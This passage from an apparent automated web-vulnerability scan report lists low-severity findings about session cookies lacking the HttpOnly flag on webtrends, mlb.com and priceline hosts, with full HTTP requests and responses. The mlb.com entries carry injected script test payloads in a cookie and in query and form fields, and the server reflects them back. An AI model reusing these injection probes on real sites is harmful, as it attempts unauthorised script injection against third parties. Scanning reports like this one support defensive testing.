8b66c15ffadddd07aeb250f9460b6b057407ef01cffd2193a454c3b83fa845fc98ded6bef457c93bc17ecaa9069b0e82f4e8a17e214d9cc28208446593ebc1ceef705486376b84c3971b165140960058f31a24ebdd78dda40e1df4d33cb0a0e25895c8df49c4854bbb5c1435a5a6373611b67fd5ed4455456dfe5e061dc59eef4191141e0d0cebbbbb4cb781b92e7e8616fb483130032b2512378536e0c258ba2bc76a069b759c8c4ea58f9b5ac759a529801d7ba7eda93afe0ddabb50284d0f2dd2330e40235b893f0fdbdc19c91fed6c3b901ef11a4e147b7d807d2f22b5c5ed60ec2985a5eec30af349443453a8158905daaa4ab3ef284cba238d2b33eddc4838376817bec49561a8484b5e5486b69e61b6d77380006cb4f07b4abc0e97049d0da6d59f2b8d1abaf88ef36907fd525691579327f18efee02836a77f4df2e3be17598d3b2e778029bba743ee8ccd845ea6294f06e2decf38abc4ebd95b95c510c7161faabbad762f454429e9f43927ce5a51f3771c7da9144261adc801782c234a62e741a2649cf5409d6a5228dd012b0f5fb3ea5a14d8b11bfa76748fc9
f8331643549233dc7357c4975f7e97c004bd9e5dcc60318d2b38ade449d6cd0bc0da163ca2e2c4297f6152d0aa548b27d987e3d839ab944c7f560e8e4b0e52bf46302a88e7cdea9f0e86a7b4c0a01e32ab8b90482efe55db125a2ff53fdd80c39a4807bd9d1e13e56e2da4058f0ffb9d7d0d21e8f86286b288f55fa6e898222c74dd91f19e8bb4e607fd2a4bc0e3c538383c327191ca03e7849185da7384812fda77ed78a439991ce205c96df42fd8c9cc937c5383f7250ca2061e1f47daf3fa197aa139df9f6e4efa9e59d75be2c49820728fa1f9c7ef5bb6cc9e0e218461a09d818da52d4bb27dcbf682b79452c84d2c97a61e3989ef5a27a040eceed8b1e79127130111b637e59e539ee9b1314215045bc86f7123a277006a15b4 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/about-us/corporate-social-responsibility.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=27DB104FF240B21CA30EC91928AC60D3; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d042f457f; _wt.mode-79569=fcdcc722e93201f611e1; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a059683f7

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:05 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A41F4D7EB85977B26917F3C61E7ED309; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d030fc451; Expires=Sun, 01-Jan-2012 00:03:06 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=018ce995; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e932031ed775; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.53. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242f06ec4338f0c9609ed6286853138dbcf4b992a457f09522bedec119d956e043c6b5402b520bf74799c4cc7352300b03ec55280aee97c70eadf262fc27cbb7d1dc35c2e78397fd23e977853c5a3d30e2a3a2ed6b5bf1d1ebe14630a4b801ce334f0d6b7e654b582da1ce5b34bff1ee3a54c9f54797c5759ea6685618f272e01ec89ac279236b644448ae5e9470856b0eed63ab489a93ed746c3c0b9cccd150198cac82b4a05f4998f7dce37bbdf017ad4a4ee52a53e63863fca84f824e07d3d0be3ff88889026995f5e1087634ee46e4fedb02527ba58bd7f9d2ce466b0b7cbcf63ecba56f9f81b18b5d0859f49278b4c775444697be06e2b9b565cc04d93745fad54191ca808e5e5b2e7ef0a49077aaaaa8b448ea80ff467d08836009661c7768fadf41dd83148f0919ac17152cc65b25fba3f11362bd56a5f6d6930237f44a642d59f380be709504679151cbde6f81f414d5612b99bda4efab25f269df3baac129f6d64eaa245b933c89f2c31d2c578cbc2385011b00c499227f7f377b927155dce8337fa811f6c2d831fc7113df4c487a6028e45f7d275955a8488303624f90d82ded93fae2d188aa6373b0b6287708146a89a4553a79039e9a14baf71203aa0ec8b757b6c5a0d8a5a83c49b1cf7011aae39b6ca275b2ea43a6203cc1644f4870b6f1bbb3da0495f82d6f68b398a66d7eecc1eaff848e155512b5e2015ed12a39363d2f00cd9ba2bbb47eff6b092f2ac07d836d061d9b615f364ceb9bde36a355e9edd840e4c6b9eeaced8e6754b802c63938edb405b1310980e25fb3b0fc0ef19c5bc1d5aa1c06ffced00877b9c

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/about-us.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=83141D1BF679315B3A6FE0130C26720B; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; _wt.mode-79569=fcdcc722e93200beff43; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00d8b959

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:04 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=2D0CE6DA7B82936A31CBC9ACE233AAA7; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.54. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/private-banking/products-services/investment-management.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D04074B23F5A36B7B29BA0731F53ABEE; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a059683f7; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d030fc451; _wt.mode-79569=fcdcc722e932031ed775

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:13 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=6FBCA80F75E0528A929525FF0B85D1D0; Path=/ots
Set-Cookie: _wt.mode-79569=e1f36dbd085f0041d284; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a04d7d1af; Expires=Sun, 01-Jan-2012 00:03:13 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.55. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f6866c92a8364fce80a4ac8ec97ff3af0ab1a91f759648ddbe8945b1fbc2a0c691c542d898873efe10f7b76c498ddb47cc43ec556e608db660d2da235157b5b9128144e031cdcb7ce883bc49bd6f4730c072d8a321c7d52ad125718084660403740fb6f080029b901e51b24a6221c496ceb95bab942b3a694ac765383e98e433393622f9d9f17e931a8eda17a812d683a6150e4b01c1e0f9ef4d85dc205723703dd0fc6f4124ba9072e2cc09f47b21bb5e672212e3bf7da7533d15f6a230f3710ab161f7f7a5b2a5a252d0a6ba81833bf9f72e776e1b061e383a6b4ac8ad21981ede323ce029e217dc6b4d3a767b82ede1afb1656cb9c46328b4e42351722cb1d0d00694805d504d7ee408963b59c5a0893a5345fde273fc33c0e2ae6543d340c434db5f5259b7c7a5f2ab848cc79dbebf67b9d533ae620852ed6c1d8920d6a293dfe8f9455e3509c5743fc507676071657ae654d7e8d39b07d29e1dc0de2e4372f95c7dc69176950b55e8a6452d713c02b77c0fd34c5119312dffa7d3723ea65f04253b14909bdfcd742cdedd8463497ed70186343273d6a7dc38dd0afe739fd0e2de4758ed2f619fcd61a33f241c15d3272636c5796d73761aa33cfc4bc40be761eaed05ab54419f5c774db5deebc8e4833933c2af78df019a9a326c24e6a99661a26fc6eeedb21a699fcab31cfc38689c60f666b098b2dd24a10e2b2801ea302c1b98bcfa9e50e84f373b269d6d2f7c1b4d28cd72ffdefaf3568c918f5240b9d3a75973ad955ba1cf4ce1a6687430fbfe8f238d3e1d50bb3de38e9966513f7b8d9814cea014bbe91045a7b3d6f41e0c0f30fcd6136d2216784d7da050198f0ca45cff981d25dcec38e29ec2ceabcdc69d0af985a319f277e893cdd705cc459b97a9f26f4f8c39db8a788cebbd56b8dbbb3be102559f17ed51fcf3971853502735446a1a8e4e673c9e1afef64e03a50b1c5ac11b9d02a126640e6e99925fd9c093efb0b093fed00776fae8b6a234b859eda6ebf7ead2a428a2aed140bda22bd319549c4fb4abd4520f933fd05556a3e6d6ba22da703548b4e7dae33bf5d75dda5069cc291a5d21f7457fb554ad2f7406babc64b17db2a18a0c2519aacfd9326004520a2af2e8bb3be2e167b47e96610a60345f48d763bbc0a7dc4f7a39b47c9801dffaadd31a10763ef4d4edbab6edde4160908762feaf55d3b14e034a5c8f914aa5d955986e97282a3fa74e19cfc572e502f6bdf268576d8cef039bd66133d42aac8dd6f6058e280d61404400220b20e735a9a73667798fda7d646935c4d8acb985ea69f8b3f1a7d923def6aba934941b3dda9836064000a5977ed64124fb6efac5661506723c89
3c81099fd42d42a3267cb2bf376fb91ab003a639be54757e1a4521a98a0cc1919024fe93c16cc95d1cc3761f72590a6a2a2ee078c6e44d87f93480221b85202df07007d97d8a356e3f8fb1962e543a9f04feb0616791ad0125373ad059162a71bbf171f1b26df160876eaf9338caf44f170855d2286eedea1c59d22676858ef53fd11c1ab5a04c6265b369b6fcab8dbf743de1ab8aafaa608973f2f35bfdd8625668ef2bf523b1d91bcd7fbf58e05b67c28d8c4e00a0cbe7a0392ce7e474bc1b86b63b253cbbf302542253da8424ddf9440265015aff36dad47ae90fa3000df4d6

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/barclays-infinite-credit-card.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A3D550880A45CA7718800D08622321F7; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200988e87; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d05e2ee14; _wt.mode-79569=fcdcc722e93202f2ddfb

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:18 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=DF89E5BAA7A71BDFFD734919F4B8C6D8; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.56. https://secure.mlb.com/resetPassword.do

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.mlb.com
Path:   /resetPassword.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /resetPassword.do HTTP/1.1
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: secure.mlb.com
Cookie: s_cc=true; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D

uri=%2Faccount%2Fforgot_password.jsp&emailAddress=*%2F%0Adocument.title%3D1317599291294048%2F*

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:21 GMT
Content-type: text/html;charset=utf-8
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/
Content-Length: 76221


                       
...[SNIP]...

14.57. https://secure.mlb.com/shared/scripts/bam/bam.env.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.mlb.com
Path:   /shared/scripts/bam/bam.env.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/scripts/bam/bam.env.jsp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Accept-Language: en-us
Referer: https://secure.mlb.com/resetPassword.do
Accept: */*
Host: secure.mlb.com
Cookie: s_cc=true; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:42 GMT
Expires: Mon, 03 Oct 2011 01:48:42 GMT
Edge-control: max-age=7200
Content-type: text/javascript;charset=ISO-8859-1
Content-length: 811
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/


(function (window, $, bam) {

bam.env = bam.env || {};
bam.env.host = bam.env.host || {};

$.extend(bam.env.host, {

/**
* Returns base url for the CDN server

...[SNIP]...

14.58. https://secure.mlb.com/style/bam.css.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.mlb.com
Path:   /style/bam.css.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/bam.css.jsp?c_id=%0Adocument.title=1317599335378049; HTTP/1.1
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-length: 0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: secure.mlb.com
Cookie: s_cc=true; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:58 GMT
Expires: Mon, 03 Oct 2011 01:48:58 GMT
Edge-control: max-age=7200
Content-type: text/css;charset=ISO-8859-1
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/
Content-Length: 9935


/* buttons */
/* global */
.bam-button {
font-family:"Helvetica", "Helvetica Neue", arial, sans-serif;
font-size:13px;
font-weight:bold;
text-decoration:none;
-moz-border-r
...[SNIP]...

14.59. https://secure.mlb.com/style/nav_2011.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.mlb.com
Path:   /style/nav_2011.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/nav_2011.jsp?c_id=%0Adocument.title=1317599336102051;&section=schedule HTTP/1.1
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-length: 0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: secure.mlb.com
Cookie: s_cc=true; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:59 GMT
Expires: Mon, 03 Oct 2011 01:48:59 GMT
Edge-control: max-age=7200
Content-type: text/css;charset=ISO-8859-1
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/
Content-Length: 16918


/* global overides */
#masthead body, #masthead div, #masthead dl, #masthead dt, #masthead dd, #masthead ul, #masthead ol, #masthead
...[SNIP]...

14.60. http://travela.priceline.com/hotel/leaveBehindPop.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://travela.priceline.com
Path:   /hotel/leaveBehindPop.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotel/leaveBehindPop.do?INIT_SESSION=false&src_path=RTL&src_page=LIST&trySecSwap=Y&checkInDate=10%2F04%2F2011&checkOutDate=10%2F07%2F2011&city=Boston%2C+MA&displayCity=Boston&cityID=3000008602&numberOfRooms=1&country=US&static=Y HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=58AA51FFBF9D4E024C54F62C7478894F; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600744165:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.2.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:32:26 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=4663010a5463010a2011100300322608e011577265; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=93E8720C5EB8B62C63F1FFE2A3CCE4FE; Path=/hotel
Vary: Accept-Encoding
Content-Length: 959
Content-Type: text/html;charset=ISO-8859-1

<html>
<head>

<script language="Javascript">
function checkDom() {
   var sTest = "";
   var newURL;
   var thisURL = window.location.href;
   var bSecSwap = true;
   try{
       sTest = window.opener.doc
...[SNIP]...

14.61. http://travela.priceline.com/hotel/newHotelSearch.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://travela.priceline.com
Path:   /hotel/newHotelSearch.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /hotel/newHotelSearch.do?jsk=4663010a5564010a20111003003755e18011569968&plf=PCLN&searchType=CITY&noWait=Y HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 192
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=4663010a5564010a20111003003755e18011569968&key=gtaqdik9&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
